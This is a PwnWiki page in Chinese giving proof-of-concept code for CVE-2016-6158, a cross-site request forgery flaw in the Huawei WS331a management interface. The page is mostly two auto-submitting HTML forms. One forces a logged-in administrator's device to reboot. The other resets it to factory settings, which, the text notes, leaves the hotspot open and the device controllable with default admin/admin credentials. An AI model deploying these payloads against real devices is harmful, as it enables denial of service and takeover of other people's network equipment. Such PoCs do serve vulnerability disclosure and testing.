CVE-2016-6158 華為WS331a產品管理頁面CSRF漏洞

From PwnWiki
Revision as of 19:15, 15 April 2021 by Pwnwiki (talk | contribs) (Created page with "==POC== 當管理員登陸後,打開如下poc頁面,WS331a設備將重啟。 <pre> <form action="http://192.168.3.1/api/service/reboot.cgi" method="post"> </form> <script>...")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

POC

當管理員登陸後,打開如下poc頁面,WS331a設備將重啟。 

<form action="http://192.168.3.1/api/service/reboot.cgi" method="post">
</form>
<script> document.forms[0].submit(); </script>

當管理員登陸後,打開如下poc頁面,WS331a設備將恢復初始化配置。設備自動重啟後不需要密碼即可連接熱點,並使用amdin/admin對設備進行管理控制。 

<form action="http://192.168.3.1/api/service/restoredefcfg.cgi" method="post">
</form>
<script> document.forms[0].submit(); </script>
Retrieved from "https://pwnwiki.com/index.php?title=CVE-2016-6158_華為WS331a產品管理頁面CSRF漏洞&oldid=1691"